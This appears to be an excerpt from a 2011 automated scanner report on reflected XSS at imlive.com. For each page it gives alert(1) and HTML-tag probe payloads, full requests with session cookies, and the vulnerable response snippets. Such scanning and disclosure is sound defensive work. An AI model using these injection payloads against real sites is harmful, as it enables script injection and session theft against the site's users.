The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:56 GMT
Connection: close
Content-Length: 26092
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.505. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 26239
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.506. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:18 GMT
Connection: close
Content-Length: 116890
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.507. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:09 GMT
Connection: close
Content-Length: 116726
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1">
...[SNIP]...

4.508. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:45 GMT
Connection: close
Content-Length: 214124
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1">
...[SNIP]...

4.509. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:57 GMT
Connection: close
Content-Length: 214380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.510. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:27 GMT
Connection: close
Content-Length: 25109
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

4.511. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:02 GMT
Connection: close
Content-Length: 24983
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.512. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5370e"><a>3222e16e08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
